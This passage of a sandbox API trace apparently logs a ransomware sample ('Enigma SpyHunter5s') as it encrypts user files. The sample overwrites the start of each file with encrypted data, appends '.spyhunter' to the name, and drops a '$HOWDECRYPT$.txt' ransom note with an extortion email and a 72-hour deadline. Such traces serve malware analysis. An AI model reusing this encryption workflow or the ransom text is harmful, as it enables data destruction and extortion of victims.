(lpFirst="Help_MKWD_AssetId.H1W", lpSrch=".txt") returned 0x0 [0147.109] GetProcessHeap () returned 0x2c0000 [0147.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0147.110] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ee74*=0x2800, lpOverlapped=0x0) returned 1 [0147.133] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.133] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee74, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ee74*=0x2800, lpOverlapped=0x0) returned 1 [0147.134] GetProcessHeap () returned 0x2c0000 [0147.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0147.134] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.134] WriteFile (in: hFile=0x9c, lpBuffer=0x57eeb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee74, lpOverlapped=0x0 | out: lpBuffer=0x57eeb4*, lpNumberOfBytesWritten=0x57ee74*=0x4, lpOverlapped=0x0) returned 1 [0147.543] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee74, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee74*=0x30, lpOverlapped=0x0) returned 1 [0147.543] CloseHandle (hObject=0x9c) returned 1 [0147.543] GetProcessHeap () returned 0x2c0000 [0147.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.543] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.spyhunter") returned 92 [0147.543] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w.spyhunter")) returned 1 [0147.544] GetProcessHeap () returned 0x2c0000 [0147.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.544] GetProcessHeap () returned 0x2c0000 [0147.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.544] GetProcessHeap () returned 0x2c0000 [0147.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64c68 | out: hHeap=0x2c0000) returned 1 [0147.545] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eeb0 | out: pbBuffer=0x57eeb0) returned 1 [0147.545] GetProcessHeap () returned 0x2c0000 [0147.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.545] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eea8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eea8*=0x30) returned 1 [0147.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\sPtcTCmwmbvW6h igy5N.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\sptctcmwmbvw6h igy5n.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0147.545] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\sPtcTCmwmbvW6h igy5N.swf") returned 83 [0147.545] StrStrW (lpFirst="sPtcTCmwmbvW6h igy5N.swf", lpSrch=".txt") returned 0x0 [0147.545] GetProcessHeap () returned 0x2c0000 [0147.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0147.546] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57ee6c*=0x2800, lpOverlapped=0x0) returned 1 [0147.546] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.547] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57ee6c*=0x2800, lpOverlapped=0x0) returned 1 [0147.547] GetProcessHeap () returned 0x2c0000 [0147.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0147.547] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.547] WriteFile (in: hFile=0x9c, lpBuffer=0x57eeac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x57eeac*, lpNumberOfBytesWritten=0x57ee6c*=0x4, lpOverlapped=0x0) returned 1 [0147.547] WriteFile (in: hFile=0x9c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee6c*=0x30, lpOverlapped=0x0) returned 1 [0147.547] CloseHandle (hObject=0x9c) returned 1 [0147.640] GetProcessHeap () returned 0x2c0000 [0147.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.641] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\sPtcTCmwmbvW6h igy5N.swf.spyhunter") returned 93 [0147.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\sPtcTCmwmbvW6h igy5N.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\sptctcmwmbvw6h igy5n.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\sPtcTCmwmbvW6h igy5N.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\sptctcmwmbvw6h igy5n.swf.spyhunter")) returned 1 [0147.641] GetProcessHeap () returned 0x2c0000 [0147.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.641] GetProcessHeap () returned 0x2c0000 [0147.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.641] GetProcessHeap () returned 0x2c0000 [0147.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f647b8 | out: hHeap=0x2c0000) returned 1 [0147.642] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eeb0 | out: pbBuffer=0x57eeb0) returned 1 [0147.642] GetProcessHeap () returned 0x2c0000 [0147.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.642] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eea8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eea8*=0x30) returned 1 [0147.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\DTlbdGEm.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\dtlbdgem.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\DTlbdGEm.swf") returned 71 [0147.642] StrStrW (lpFirst="DTlbdGEm.swf", lpSrch=".txt") returned 0x0 [0147.642] GetProcessHeap () returned 0x2c0000 [0147.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.642] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee6c*=0x2800, lpOverlapped=0x0) returned 1 [0147.643] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.643] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee6c*=0x2800, lpOverlapped=0x0) returned 1 [0147.643] GetProcessHeap () returned 0x2c0000 [0147.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.643] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.644] WriteFile (in: hFile=0xa0, lpBuffer=0x57eeac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x57eeac*, lpNumberOfBytesWritten=0x57ee6c*=0x4, lpOverlapped=0x0) returned 1 [0147.644] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee6c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee6c*=0x30, lpOverlapped=0x0) returned 1 [0147.644] CloseHandle (hObject=0xa0) returned 1 [0147.644] GetProcessHeap () returned 0x2c0000 [0147.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.644] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\DTlbdGEm.swf.spyhunter") returned 81 [0147.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\DTlbdGEm.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\dtlbdgem.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2LQ9alkNqdSJiDVkQ\\DTlbdGEm.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2lq9alknqdsjidvkq\\dtlbdgem.swf.spyhunter")) returned 1 [0147.645] GetProcessHeap () returned 0x2c0000 [0147.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.645] GetProcessHeap () returned 0x2c0000 [0147.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.645] GetProcessHeap () returned 0x2c0000 [0147.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee170 | out: hHeap=0x2c0000) returned 1 [0147.645] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eea8 | out: pbBuffer=0x57eea8) returned 1 [0147.645] GetProcessHeap () returned 0x2c0000 [0147.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.645] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eea0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eea0*=0x30) returned 1 [0147.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.645] GetProcessHeap () returned 0x2c0000 [0147.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.645] GetProcessHeap () returned 0x2c0000 [0147.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0ad68 | out: hHeap=0x2c0000) returned 1 [0147.646] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eea8 | out: pbBuffer=0x57eea8) returned 1 [0147.646] GetProcessHeap () returned 0x2c0000 [0147.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.646] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57eea0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57eea0*=0x30) returned 1 [0147.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.646] GetProcessHeap () returned 0x2c0000 [0147.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.646] GetProcessHeap () returned 0x2c0000 [0147.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0acc8 | out: hHeap=0x2c0000) returned 1 [0147.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.646] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.647] WriteFile (in: hFile=0xa0, lpBuffer=0x57edd7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ef00, lpOverlapped=0x0 | out: lpBuffer=0x57edd7*, lpNumberOfBytesWritten=0x57ef00*=0x127, lpOverlapped=0x0) returned 1 [0147.647] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.648] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ef00, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ef00*=0x2ac, lpOverlapped=0x0) returned 1 [0147.648] CloseHandle (hObject=0xa0) returned 1 [0147.648] GetProcessHeap () returned 0x2c0000 [0147.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e0b8 | out: hHeap=0x2c0000) returned 1 [0147.648] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eea0 | out: pbBuffer=0x57eea0) returned 1 [0147.648] GetProcessHeap () returned 0x2c0000 [0147.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.648] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee98*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee98*=0x30) returned 1 [0147.648] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.648] GetProcessHeap () returned 0x2c0000 [0147.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.648] GetProcessHeap () returned 0x2c0000 [0147.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fee098 | out: hHeap=0x2c0000) returned 1 [0147.649] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee98 | out: pbBuffer=0x57ee98) returned 1 [0147.649] GetProcessHeap () returned 0x2c0000 [0147.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.649] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee90*=0x30) returned 1 [0147.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.649] GetProcessHeap () returned 0x2c0000 [0147.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.649] GetProcessHeap () returned 0x2c0000 [0147.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f660 | out: hHeap=0x2c0000) returned 1 [0147.649] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee98 | out: pbBuffer=0x57ee98) returned 1 [0147.649] GetProcessHeap () returned 0x2c0000 [0147.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.649] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee90*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee90*=0x30) returned 1 [0147.649] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.650] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0147.650] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0147.650] GetProcessHeap () returned 0x2c0000 [0147.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.650] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ee54*=0x20c, lpOverlapped=0x0) returned 1 [0147.651] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.651] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x57ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ee54*=0x20c, lpOverlapped=0x0) returned 1 [0147.651] GetProcessHeap () returned 0x2c0000 [0147.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.651] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.651] WriteFile (in: hFile=0xa0, lpBuffer=0x57ee94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ee54, lpOverlapped=0x0 | out: lpBuffer=0x57ee94*, lpNumberOfBytesWritten=0x57ee54*=0x4, lpOverlapped=0x0) returned 1 [0147.651] WriteFile (in: hFile=0xa0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ee54, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ee54*=0x30, lpOverlapped=0x0) returned 1 [0147.651] CloseHandle (hObject=0xa0) returned 1 [0147.651] GetProcessHeap () returned 0x2c0000 [0147.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.651] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.spyhunter") returned 64 [0147.652] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini.spyhunter")) returned 1 [0147.652] GetProcessHeap () returned 0x2c0000 [0147.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.652] GetProcessHeap () returned 0x2c0000 [0147.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.652] GetProcessHeap () returned 0x2c0000 [0147.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2b70 | out: hHeap=0x2c0000) returned 1 [0147.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee90 | out: pbBuffer=0x57ee90) returned 1 [0147.652] GetProcessHeap () returned 0x2c0000 [0147.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.653] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee88*=0x30) returned 1 [0147.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.653] GetProcessHeap () returned 0x2c0000 [0147.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.653] GetProcessHeap () returned 0x2c0000 [0147.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e650 | out: hHeap=0x2c0000) returned 1 [0147.653] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ee90 | out: pbBuffer=0x57ee90) returned 1 [0147.653] GetProcessHeap () returned 0x2c0000 [0147.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0147.653] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ee88*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ee88*=0x30) returned 1 [0147.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.653] GetProcessHeap () returned 0x2c0000 [0147.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0147.653] GetProcessHeap () returned 0x2c0000 [0147.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e5a8 | out: hHeap=0x2c0000) returned 1 [0147.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.654] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with 